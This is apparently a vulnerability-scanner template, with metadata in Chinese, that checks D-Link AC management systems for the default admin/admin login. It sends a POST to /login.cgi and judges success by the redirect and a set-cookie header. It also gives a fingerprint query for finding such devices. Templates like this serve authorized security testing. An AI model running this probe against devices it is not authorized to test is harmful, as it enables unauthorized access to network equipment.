id: dlink-ac-default-password

info:
  name: D-Link AC管理系统默认账号密码
  author: jijue
  severity: high
  verified: false
  description: |
    D-Link AC管理系统存在默认账号密码，可被获取敏感信息
    "AC集中管理平台" && body="D-Link路由器管理页"

rules:
  r0:
    request:
      method: POST
      path: /login.cgi?set_language=CN
      body: user=admin&password=admin&selectLanguage=CN&Submit=%E7%99%BB%E9%99%86
    expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?_") && response.raw_header.ibcontains(b"set-cookie")
expression: r0()